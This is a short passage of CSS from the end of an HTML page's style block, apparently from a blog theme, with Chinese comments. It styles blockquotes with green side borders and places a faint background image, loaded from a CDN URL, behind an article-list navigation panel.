    /*引用块样式*/
    
    .post .pjax article blockquote {
        padding: 10px 20px;
        background-color: white;
        border: none;
        border-left: 4px solid #42b983;
        border-right: 4px solid #42b983;
        border-radius: 10px;
    }
    

    /*文章列表背景图*/
    
    .nav-right:before {
        content: ' ';
        display: block;
        position: absolute;
        left: 0;
        top: 0;
        width: 100%;
        height: 100%;
        opacity: 0.1;
        background: url("http://oy0tigw51.bkt.clouddn.com/201711210136_683.png");
        background-repeat: no-repeat;
        background-position: 50% 0;
        -ms-background-size: cover;
        -o-background-size: cover;
        -moz-background-size: cover;
        -webkit-background-size: cover;
        background-size: cover;
    }
    
</style>
</html>
